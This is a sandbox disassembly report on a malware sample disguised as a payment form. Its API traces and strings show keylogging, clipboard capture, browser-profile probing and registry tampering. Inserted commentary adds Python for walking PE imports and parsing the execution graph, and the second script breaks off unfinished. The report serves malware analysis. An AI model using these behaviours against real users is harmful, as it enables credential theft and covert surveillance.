                                                • Part of subcall function 00419959: GetCurrentProcessId.KERNEL32(00000000,?,?,?,?,?,?,0040405C), ref: 00419980
                                                • Part of subcall function 004168A6: CloseHandle.KERNEL32(004040D5,?,?,004040D5,00462E24), ref: 004168BC
                                                • Part of subcall function 004168A6: CloseHandle.KERNEL32($.F,?,?,004040D5,00462E24), ref: 004168C5
                                                • Part of subcall function 0041A20F: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,0040410F,00462E24), ref: 0041A228
                                              • Sleep.KERNEL32(000000FA,00462E24), ref: 00404118
                                              Strings
                                              • /sort "Visit Time" /stext ", xrefs: 00404092
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CloseFileHandle$CreateCurrentModuleNameProcessSleep
                                              • String ID: /sort "Visit Time" /stext "
                                              • API String ID: 368326130-1573945896
                                              • Opcode ID: ed87d0c96b14ea75789ea05f3b8136ef3461a361f10e5df7e9a96e23841fb500
                                              • Instruction ID: 7f8942f24ccac46b0034012f494d3192eca769648d2eef92b07e1d28e9d76a7f
                                              • Opcode Fuzzy Hash: ed87d0c96b14ea75789ea05f3b8136ef3461a361f10e5df7e9a96e23841fb500
                                              • Instruction Fuzzy Hash: B5316431A0021556CB14FBB6DC969EE73B9AF90308F40017FF506B71E2EE38594ACA99
                                              APIs
                                                • Part of subcall function 00432525: __onexit.LIBCMT ref: 0043252B
                                              • __Init_thread_footer.LIBCMT ref: 0040A6E3
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Init_thread_footer__onexit
                                              • String ID: [End of clipboard]$[Text copied to clipboard]
                                              • API String ID: 1881088180-3686566968
                                              • Opcode ID: 8b3756b0909f45d78d669578ef8912b34d58c84c6c9fb6c8f8edd64ed624e4fc
                                              • Instruction ID: 89f5e7c07999504d217297f9a041c68b3e0b8c5632e5b70e4a6c966e9d45e494
                                              • Opcode Fuzzy Hash: 8b3756b0909f45d78d669578ef8912b34d58c84c6c9fb6c8f8edd64ed624e4fc
                                              • Instruction Fuzzy Hash: 42218D31A002055ACB04FBA5D892DEDB378AF54308F10453FF506771D2EF38AE4A8A8D
                                              APIs
                                              • GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,0044EF72,?,00000050,?,?,?,?,?), ref: 0044EDF2
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID: ACP$OCP
                                              • API String ID: 0-711371036
                                              • Opcode ID: 2f6255c43d422f9ec28f5694223862b2eeac92ff2acac738a800f64e00dd4497
                                              • Instruction ID: ce4b6ecbf16ce97eee8671cf775368e41a8ae942868fb71505acbacd33d5bec2
                                              • Opcode Fuzzy Hash: 2f6255c43d422f9ec28f5694223862b2eeac92ff2acac738a800f64e00dd4497
                                              • Instruction Fuzzy Hash: 4F21F1E2E00102A2FB348B67CC01BAB72A6FF54B51F568426E90AD7300EB3ADD41C35C
                                              APIs
                                              • GetWindowTextW.USER32(?,?,0000012C), ref: 00415B2E
                                              • IsWindowVisible.USER32(?), ref: 00415B37
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Window$TextVisible
                                              • String ID: (%G
                                              • API String ID: 1670992164-3377777310
                                              • Opcode ID: 6f17d284cfdb4df53722abd5a13ccbba9f2a9602f3f7b51a6171a740e00953ec
                                              • Instruction ID: 7bdbcb6602ffb42e5ce2137d58ff1a132c15f169860b2e192372582f8912ca7a
                                              • Opcode Fuzzy Hash: 6f17d284cfdb4df53722abd5a13ccbba9f2a9602f3f7b51a6171a740e00953ec
                                              • Instruction Fuzzy Hash: E42166315182019BC314FB61D891EEFB7E9AF94304F50493FF49A920E2FF349A49CA5A
                                              APIs
                                              • GetLocalTime.KERNEL32(?,004724A8,?,00000000,?,?,?,?,?,?,004146C2,?,00000001,0000004C,00000000), ref: 00405010
                                                • Part of subcall function 004194DA: GetLocalTime.KERNEL32(00000000), ref: 004194F4
                                              • GetLocalTime.KERNEL32(?,004724A8,?,00000000,?,?,?,?,?,?,004146C2,?,00000001,0000004C,00000000), ref: 00405067
                                              Strings
                                              • Connection KeepAlive | Enabled | Timeout: , xrefs: 00404FFF
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: LocalTime
                                              • String ID: Connection KeepAlive | Enabled | Timeout:
                                              • API String ID: 481472006-507513762
                                              • Opcode ID: db71296423f5ae0c940390bca2fe76bdaa24d7f5692d89ec5d6dad89ab0214d4
                                              • Instruction ID: 0beb7a88d254a358a963561f9d97893b624dd36ca90e96b80d49a5b3b1f878f3
                                              • Opcode Fuzzy Hash: db71296423f5ae0c940390bca2fe76bdaa24d7f5692d89ec5d6dad89ab0214d4
                                              • Instruction Fuzzy Hash: 092137719042406BD304B7219D2976F7794A745308F04047EF845132E2DBBD5988CB9F
                                              APIs
                                              • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00432D8F
                                              • ___raise_securityfailure.LIBCMT ref: 00432E76
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: FeaturePresentProcessor___raise_securityfailure
                                              • String ID: (F
                                              • API String ID: 3761405300-3109638091
                                              • Opcode ID: 8d70a3cd03553c2d68efa77227729d50617932ca87f7888c32547dfbcc783ade
                                              • Instruction ID: 494dc9d0fce29d31cb3ef34e393fed80e8221b4646dfbf54f91bf1ae82b1ca01
                                              • Opcode Fuzzy Hash: 8d70a3cd03553c2d68efa77227729d50617932ca87f7888c32547dfbcc783ade
                                              • Instruction Fuzzy Hash: 8C21F0BD500205DEE700DF16E9856403BE4BB49314F20943AE9088B3A1F3F669918F9F
                                              APIs
                                              • GetLocalTime.KERNEL32(00000000), ref: 004194F4
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: LocalTime
                                              • String ID: | $%02i:%02i:%02i:%03i
                                              • API String ID: 481472006-2430845779
                                              • Opcode ID: 3ac86647c9e14ca6f93bd036f528b1de7b867f3a903355216a00816ff0bb3ae2
                                              • Instruction ID: bce8772fa89f7f7ff9e68bb522557632f538b64cb503c22793e2f51f4d03e72f
                                              • Opcode Fuzzy Hash: 3ac86647c9e14ca6f93bd036f528b1de7b867f3a903355216a00816ff0bb3ae2
                                              • Instruction Fuzzy Hash: 68117F315042015AC304FBA5D8518EBB3E8AB94308F500A3FF895A21E2FF3CDA49C65A
                                              APIs
                                              • PathFileExistsW.SHLWAPI(00000000,00000000,?,?,?,?,?,00415594,00000000), ref: 00418CF2
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: ExistsFilePath
                                              • String ID: alarm.wav$x(G
                                              • API String ID: 1174141254-2413638199
                                              • Opcode ID: 26c40b3e06d19070c32931467931773a754d599fffa5f8131170b201d030b6b4
                                              • Instruction ID: fe962266bcbe9b481af3baecc2186877703bd5259ecc619923a55b1e0e4c82aa
                                              • Opcode Fuzzy Hash: 26c40b3e06d19070c32931467931773a754d599fffa5f8131170b201d030b6b4
                                              • Instruction Fuzzy Hash: 40019270B0430056C604F7A6E9566EE37958BA1358F00857FA849672E2EEBD4D45C6CF
                                              APIs
                                                • Part of subcall function 0040A0B0: GetLocalTime.KERNEL32(?,Offline Keylogger Started,00472008), ref: 0040A0BE
                                                • Part of subcall function 0040A0B0: wsprintfW.USER32 ref: 0040A13F
                                                • Part of subcall function 004194DA: GetLocalTime.KERNEL32(00000000), ref: 004194F4
                                              • CloseHandle.KERNEL32(?), ref: 00409FFD
                                              • UnhookWindowsHookEx.USER32 ref: 0040A010
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: LocalTime$CloseHandleHookUnhookWindowswsprintf
                                              • String ID: Online Keylogger Stopped
                                              • API String ID: 1623830855-1496645233
                                              • Opcode ID: 844159523aa59948fae8112936e3b7164414e1ec4be296e67346653cf839bcc0
                                              • Instruction ID: de94d33b988dbd75262e40483fa5bc1fa77a380ea8b62c1163629748a83ca489
                                              • Opcode Fuzzy Hash: 844159523aa59948fae8112936e3b7164414e1ec4be296e67346653cf839bcc0
                                              • Instruction Fuzzy Hash: 2601F530A003045BD7257F24C81BBBE7BB59B82304F40056FE541225D2EAB91866E7DF
                                              APIs
                                              • PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Microsoft\Edge\,00000000,?,?,?,?,?,?,0040B5A1), ref: 0040B49A
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: ExistsFilePath
                                              • String ID: UserProfile$\AppData\Local\Microsoft\Edge\
                                              • API String ID: 1174141254-2800177040
                                              • Opcode ID: 200434b00567c705a4ec0a270c708b4aa76ad6954a3f043ed238abe1da8ba248
                                              • Instruction ID: 5821409638838460856efc798fa08f59aead72c028a5ec3eaf808f19191aee33
                                              • Opcode Fuzzy Hash: 200434b00567c705a4ec0a270c708b4aa76ad6954a3f043ed238abe1da8ba248
                                              • Instruction Fuzzy Hash: CBF0547090021996CA04FBA6CC57DFF7B6CDA10715B40057FBA01721D3EEBC9E5586D9
                                              APIs
                                              • PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Google\Chrome\,00000000,?,?,?,?,?,?,0040B53E), ref: 0040B437
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: ExistsFilePath
                                              • String ID: UserProfile$\AppData\Local\Google\Chrome\
                                              • API String ID: 1174141254-4188645398
                                              • Opcode ID: 193e4a0aa2e06cf31c08a4dbc3c584a06e36efb5f13c49c06d899c900d91791a
                                              • Instruction ID: 3f8b084fd7c06795b4d0fa8893062b22b44e731770192fac0e06baefb29df0f7
                                              • Opcode Fuzzy Hash: 193e4a0aa2e06cf31c08a4dbc3c584a06e36efb5f13c49c06d899c900d91791a
                                              • Instruction Fuzzy Hash: 3DF08970A0021996CA04FBA6DC479FF7B6CDA10715B40007F7A01721D3EEBC9E498ADD
                                              APIs
                                              • PathFileExistsW.SHLWAPI(00000000,\Opera Software\Opera Stable\,00000000,?,?,?,?,?,?,0040B604), ref: 0040B4FD
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: ExistsFilePath
                                              • String ID: AppData$\Opera Software\Opera Stable\
                                              • API String ID: 1174141254-1629609700
                                              • Opcode ID: e4ae74f1faaf2e31d842f90866caaae65dad7ba321bab3a18d5cfcc659dd894d
                                              • Instruction ID: 52471f63f703214977655dbdffc05bc1b666495b4e4508f2cd1aa44db4b955b6
                                              • Opcode Fuzzy Hash: e4ae74f1faaf2e31d842f90866caaae65dad7ba321bab3a18d5cfcc659dd894d
                                              • Instruction Fuzzy Hash: 2AF05430900219A6C604FBA6CC479EF7B6C9A50709B40047FB901722D3EEB99A4586DD
                                              APIs
                                              • GetKeyState.USER32(00000011), ref: 0040A597
                                                • Part of subcall function 00409468: GetForegroundWindow.USER32 ref: 0040949C
                                                • Part of subcall function 00409468: GetWindowThreadProcessId.USER32(00000000,?), ref: 004094A7
                                                • Part of subcall function 00409468: GetKeyboardLayout.USER32(00000000), ref: 004094AE
                                                • Part of subcall function 00409468: GetKeyState.USER32(00000010), ref: 004094B8
                                                • Part of subcall function 00409468: GetKeyboardState.USER32(?), ref: 004094C5
                                                • Part of subcall function 00409468: ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 004094E1
                                                • Part of subcall function 0040962E: SetEvent.KERNEL32(?,?,00000000,0040A156,00000000), ref: 0040965A
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: State$KeyboardWindow$EventForegroundLayoutProcessThreadUnicode
                                              • String ID: [AltL]$[AltR]
                                              • API String ID: 3195419117-2658077756
                                              • Opcode ID: 93bc4c82374cea9adc1be0e1e00b15a6865a0a166cb0b06a72cbb1eb968038fe
                                              • Instruction ID: 29e442ca109236f59d068076b5b59df2bd5c1a98fb0e5871b2f0b43888bf59e1
                                              • Opcode Fuzzy Hash: 93bc4c82374cea9adc1be0e1e00b15a6865a0a166cb0b06a72cbb1eb968038fe
                                              • Instruction Fuzzy Hash: E0E0E52170432026C828363E2D2B6AE39109741761B80006FF8436B2C6EC7E8D1043CF
                                              APIs
                                              • GetKeyState.USER32(00000012), ref: 0040A5F1
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: State
                                              • String ID: [CtrlL]$[CtrlR]
                                              • API String ID: 1649606143-2446555240
                                              • Opcode ID: 32d4ed10a71edebd33ac4b48b63deb44ff05106530e36cbcea7ee1510555eeab
                                              • Instruction ID: c9b4056729f6320a31326482d9effdd17bd0eb8d0dea22e3f8a852eb4ad5c27f
                                              • Opcode Fuzzy Hash: 32d4ed10a71edebd33ac4b48b63deb44ff05106530e36cbcea7ee1510555eeab
                                              • Instruction Fuzzy Hash: 53E02672B043112AC414397E551EA2A286087917A9F46042FECC3672C3D87F8D2203CF
                                              APIs
                                              • RegOpenKeyExW.ADVAPI32(80000001,00000000,00000000,00000002,00000000,80000001,6h@,004123E9,00000000,00000000,6h@,origmsc,00000000), ref: 00412422
                                              • RegDeleteValueW.ADVAPI32(?,?), ref: 00412436
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: DeleteOpenValue
                                              • String ID: 6h@
                                              • API String ID: 2654517830-73392143
                                              • Opcode ID: 45be350e15fffb6ae5252e7309d7a4a092feaea6bf63e3a5136c94c60f555a57
                                              • Instruction ID: b623b948bfdfa0337ccefb4abe002260ff2e01b184ebd3416e4b53d264740477
                                              • Opcode Fuzzy Hash: 45be350e15fffb6ae5252e7309d7a4a092feaea6bf63e3a5136c94c60f555a57
                                              • Instruction Fuzzy Hash: 9BE0C231244208BBDF108F71DE07FFA372CDB01F01F5042A5BD0592091C666CE149664
                                              APIs
                                              • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00401D35), ref: 0043B4DB
                                              • GetLastError.KERNEL32 ref: 0043B4E9
                                              • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0043B544
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: ByteCharMultiWide$ErrorLast
                                              • String ID:
                                              • API String ID: 1717984340-0
                                              • Opcode ID: b03ae9dac27993159e2f076845c08d8301cee77c5f079c52009939e8645c9409
                                              • Instruction ID: 0ecaebee41cb6558e50c6262f5020644a21471e748dd5a13caac6b8f2b864e38
                                              • Opcode Fuzzy Hash: b03ae9dac27993159e2f076845c08d8301cee77c5f079c52009939e8645c9409
                                              • Instruction Fuzzy Hash: AD411630600205BFDB229F65D844B6B7BB4EF09328F14516EFA59AB3A1DB38CD01C799
                                              APIs
                                              • IsBadReadPtr.KERNEL32(?,00000014), ref: 004105F1
                                              • IsBadReadPtr.KERNEL32(?,00000014), ref: 004106BD
                                              • SetLastError.KERNEL32(0000007F), ref: 004106DF
                                              • SetLastError.KERNEL32(0000007E,00410955), ref: 004106F6
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: ErrorLastRead
                                              • String ID:
                                              • API String ID: 4100373531-0
                                              • Opcode ID: 9879e5f97f9034714067de51e7f9b75c8f83f84791738768acf52853c1cf03dd
                                              • Instruction ID: 0e21605053d2ba8273329305491efaf700724209343246308e891da9604144dc
                                              • Opcode Fuzzy Hash: 9879e5f97f9034714067de51e7f9b75c8f83f84791738768acf52853c1cf03dd
                                              • Instruction Fuzzy Hash: 73417C71644305DFE7208F18DC84BA7B7E4FF88714F00442EE54687691EBB5E8A5CB19
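The last function above probes 0x14-byte (20-byte) structures with IsBadReadPtr and, on failure, calls SetLastError with 0x7E and 0x7F, the Win32 codes ERROR_MOD_NOT_FOUND and ERROR_PROC_NOT_FOUND. Twenty bytes is sizeof(IMAGE_IMPORT_DESCRIPTOR), so the call pattern has the shape of a manual import resolver, the kind of routine a loader needs when it maps a PE into another process (the report's "Injects a PE file into a foreign processes" signature). That reading is an inference from the listed calls, not something the report states. The Python below is an added example, not Joe Sandbox output and not code from the sample: it walks an import directory over a constructed flat image the way such a resolver does, returning the same error codes; the DLL names, export tables and addresses are constructed for the demonstration.

```python
"""Walk a PE import directory the way a manual loader does: step through the
20-byte IMAGE_IMPORT_DESCRIPTOR entries, resolve each thunk by name or by
ordinal, and report the Win32 error code a loader sets when that fails."""
import struct

IMPORT_DESCRIPTOR_SIZE = 0x14   # sizeof(IMAGE_IMPORT_DESCRIPTOR), the 0x14 probed by IsBadReadPtr above
ERROR_MOD_NOT_FOUND = 0x7E      # the 0x7E passed to SetLastError above
ERROR_PROC_NOT_FOUND = 0x7F     # the 0x7F passed to SetLastError above
ORDINAL_FLAG32 = 0x80000000     # IMAGE_ORDINAL_FLAG32: the thunk holds an ordinal, not a name RVA


def _cstr(image, rva):
    """Read a NUL-terminated ASCII string at an RVA of a flat, RVA-addressable image."""
    end = image.index(b"\0", rva)
    return image[rva:end].decode("ascii")


def walk_imports(image, import_rva):
    """Yield (dll_name, [export_name_or_ordinal, ...]) per descriptor until the
    all-zero terminator. A descriptor lying outside the image is the case the
    sample guards with IsBadReadPtr; here it raises ValueError."""
    off = import_rva
    while True:
        if off + IMPORT_DESCRIPTOR_SIZE > len(image):
            raise ValueError("import descriptor at rva %#x lies outside the image" % off)
        oft, _stamp, _fwd, name_rva, ft = struct.unpack_from("<5I", image, off)
        if oft == 0 and name_rva == 0 and ft == 0:
            return
        thunk, entries = (oft or ft), []          # prefer the unbound ILT, fall back to the IAT
        while True:
            (val,) = struct.unpack_from("<I", image, thunk)
            if val == 0:
                break
            if val & ORDINAL_FLAG32:
                entries.append(val & 0xFFFF)
            else:
                entries.append(_cstr(image, val + 2))   # IMAGE_IMPORT_BY_NAME: 2-byte hint, then name
            thunk += 4
        yield _cstr(image, name_rva), entries
        off += IMPORT_DESCRIPTOR_SIZE


def resolve_imports(image, import_rva, exports):
    """Resolve every import against `exports` ({dll_lowercase: {name_or_ordinal: address}}),
    mirroring LoadLibrary/GetProcAddress. Returns (resolved, last_error)."""
    resolved = {}
    for dll, entries in walk_imports(image, import_rva):
        table = exports.get(dll.lower())
        if table is None:
            return resolved, ERROR_MOD_NOT_FOUND
        for entry in entries:
            if entry not in table:
                return resolved, ERROR_PROC_NOT_FOUND
            resolved[(dll, entry)] = table[entry]
    return resolved, 0


def build_image(imports, str_base=0x1000, thunk_base=0x2000, desc_base=0x3000):
    """Lay out a constructed flat image holding only an import directory
    (strings at str_base, thunk tables at thunk_base, descriptors at desc_base).
    Returns (image_bytes, import_directory_rva)."""
    strings, thunks, descs = bytearray(), bytearray(), bytearray()
    for dll, entries in imports:
        name_rva = str_base + len(strings)
        strings += dll.encode("ascii") + b"\0"
        thunk_rva = thunk_base + len(thunks)
        for entry in entries:
            if isinstance(entry, int):
                thunks += struct.pack("<I", ORDINAL_FLAG32 | entry)
            else:
                ibn_rva = str_base + len(strings)
                strings += struct.pack("<H", 0) + entry.encode("ascii") + b"\0"   # hint + name
                thunks += struct.pack("<I", ibn_rva)
        thunks += struct.pack("<I", 0)                                   # thunk table terminator
        descs += struct.pack("<5I", thunk_rva, 0, 0, name_rva, thunk_rva)
    descs += bytes(IMPORT_DESCRIPTOR_SIZE)                               # all-zero terminator
    image = bytearray(desc_base + len(descs))
    image[str_base:str_base + len(strings)] = strings
    image[thunk_base:thunk_base + len(thunks)] = thunks
    image[desc_base:] = descs
    return bytes(image), desc_base


# Constructed sample: an import layout using API names seen in this report plus one
# import by ordinal; the export addresses are invented for the demonstration.
SAMPLE_IMPORTS = [
    ("USER32.dll", ["UnhookWindowsHookEx", "GetKeyState"]),
    ("SHLWAPI.dll", ["PathFileExistsW"]),
    ("ADVAPI32.dll", ["RegDeleteValueW", 1234]),
]
SAMPLE_EXPORTS = {
    "user32.dll": {"UnhookWindowsHookEx": 0x7FF70010, "GetKeyState": 0x7FF70020},
    "shlwapi.dll": {"PathFileExistsW": 0x7FF80010},
    "advapi32.dll": {"RegDeleteValueW": 0x7FF90010, 1234: 0x7FF90020},
}


def demo():
    image, rva = build_image(SAMPLE_IMPORTS)
    return resolve_imports(image, rva, SAMPLE_EXPORTS)


if __name__ == "__main__":
    resolved, err = demo()
    for (dll, entry), addr in resolved.items():
        print(f"{dll}!{entry} -> {addr:#x}")
    print("last error:", err)
```

The two failure paths matter for triage: a resolver that gives up with ERROR_MOD_NOT_FOUND never reaches GetProcAddress-style lookups for that module, so a payload whose unpacked stage fails in the sandbox with 0x7E usually names a DLL that is absent from the analysis VM, while 0x7F points at a missing export (often an OS-version mismatch).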

                                              Execution Graph

                                              Execution Coverage:8.1%
                                              Dynamic/Decrypted Code Coverage:100%
                                              Signature Coverage:0%
                                              Total number of Nodes:90
                                              Total number of Limit Nodes:3
                                              execution_graph 22253 16b4668 22254 16b4672 22253->22254 22256 16b4758 22253->22256 22257 16b477d 22256->22257 22261 16b4868 22257->22261 22265 16b4858 22257->22265 22262 16b488f 22261->22262 22263 16b496c 22262->22263 22269 16b44b4 22262->22269 22266 16b4868 22265->22266 22267 16b44b4 CreateActCtxA 22266->22267 22268 16b496c 22266->22268 22267->22268 22270 16b58f8 CreateActCtxA 22269->22270 22272 16b59bb 22270->22272 22272->22272 22273 7539cf8 22274 7539d16 22273->22274 22275 7539d20 22273->22275 22278 7539d60 22274->22278 22283 7539d4b 22274->22283 22279 7539d6e 22278->22279 22282 7539d8d 22278->22282 22287 75392b4 22279->22287 22282->22275 22284 7539d56 22283->22284 22285 75392b4 CloseHandle 22284->22285 22286 7539d89 22285->22286 22286->22275 22288 7539ed8 CloseHandle 22287->22288 22289 7539d89 22288->22289 22289->22275 22290 16bcfa0 22291 16bcfe6 22290->22291 22295 16bd578 22291->22295 22298 16bd588 22291->22298 22292 16bd0d3 22301 16bd1dc 22295->22301 22299 16bd1dc DuplicateHandle 22298->22299 22300 16bd5b6 22298->22300 22299->22300 22300->22292 22302 16bd5f0 DuplicateHandle 22301->22302 22303 16bd5b6 22302->22303 22303->22292 22304 16bac10 22305 16bac1f 22304->22305 22308 16bacf9 22304->22308 22318 16bad08 22304->22318 22309 16bad08 22308->22309 22312 16bad3c 22309->22312 22328 16ba02c 22309->22328 22312->22305 22313 16bad34 22313->22312 22314 16baf40 GetModuleHandleW 22313->22314 22315 16baf6d 22314->22315 22315->22305 22319 16bad19 22318->22319 22322 16bad3c 22318->22322 22320 16ba02c GetModuleHandleW 22319->22320 22321 16bad24 22320->22321 22321->22322 22326 16bafa0 GetModuleHandleW 22321->22326 22327 16baf90 GetModuleHandleW 22321->22327 22322->22305 22323 16bad34 22323->22322 22324 16baf40 GetModuleHandleW 22323->22324 22325 16baf6d 22324->22325 22325->22305 22326->22323 22327->22323 22329 16baef8 GetModuleHandleW 22328->22329 22331 16bad24 22329->22331 22331->22312 22332 16baf90 22331->22332 22336 16bafa0 
22331->22336 22333 16bafa0 22332->22333 22334 16ba02c GetModuleHandleW 22333->22334 22335 16bafb4 22334->22335 22335->22313 22337 16ba02c GetModuleHandleW 22336->22337 22338 16bafb4 22337->22338 22338->22313 22339 753804c 22340 753809c 22339->22340 22344 75383d0 22340->22344 22349 75383ce 22340->22349 22341 75380a9 22341->22341 22345 75383e0 22344->22345 22354 75383fa 22345->22354 22358 7538408 22345->22358 22346 75383ef 22346->22341 22350 75383e0 22349->22350 22352 75383fa PostMessageW 22350->22352 22353 7538408 PostMessageW 22350->22353 22351 75383ef 22351->22341 22352->22351 22353->22351 22355 753842c 22354->22355 22356 7538454 22355->22356 22362 7538512 22355->22362 22356->22346 22359 753842c 22358->22359 22360 7538454 22359->22360 22361 7538512 PostMessageW 22359->22361 22360->22346 22361->22360 22364 7538471 22362->22364 22365 753851a 22362->22365 22363 75386ab 22363->22356 22364->22356 22365->22363 22367 7534360 22365->22367 22368 75387a0 PostMessageW 22367->22368 22369 753880c 22368->22369 22369->22365
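The execution graph above is the text form of the rendered graph: each node is a decimal id followed by the hex address of the basic block and, where the block calls into the Win32 API, the API names, and each `a->b` token is an edge. Walking that stream by hand is tedious, so the Python below, an added example that is not part of the Joe Sandbox report, parses it and reports which API calls are reachable from each entry node (a node that no edge points to). The token grammar is inferred from the listing above; the embedded input is an excerpt of this report's own graph, trimmed to two of its subgraphs.

```python
"""Parse the text form of a Joe Sandbox execution graph and report which
Win32 API calls are reachable from each entry point."""
import re
from collections import defaultdict

# Excerpt of the execution_graph token stream from this report (two of the
# subgraphs in the 0x16b0000 and 0x7530000 regions of process 11), trimmed
# to the nodes used by the walk below.
EXCERPT = """execution_graph 22253 16b4668 22254 16b4672 22253->22254 22256 16b4758
22253->22256 22257 16b477d 22256->22257 22261 16b4868 22257->22261 22265 16b4858
22257->22265 22262 16b488f 22261->22262 22263 16b496c 22262->22263 22269 16b44b4
22262->22269 22266 16b4868 22265->22266 22267 16b44b4 CreateActCtxA 22266->22267
22268 16b496c 22266->22268 22267->22268 22270 16b58f8 CreateActCtxA 22269->22270
22272 16b59bb 22270->22272 22272->22272 22273 7539cf8 22274 7539d16 22273->22274
22275 7539d20 22273->22275 22278 7539d60 22274->22278 22283 7539d4b 22274->22283
22279 7539d6e 22278->22279 22282 7539d8d 22278->22282 22287 75392b4 22279->22287
22282->22275 22284 7539d56 22283->22284 22285 75392b4 CloseHandle 22284->22285
22286 7539d89 22285->22286 22286->22275 22288 7539ed8 CloseHandle 22287->22288
22289 7539d89 22288->22289 22289->22275"""

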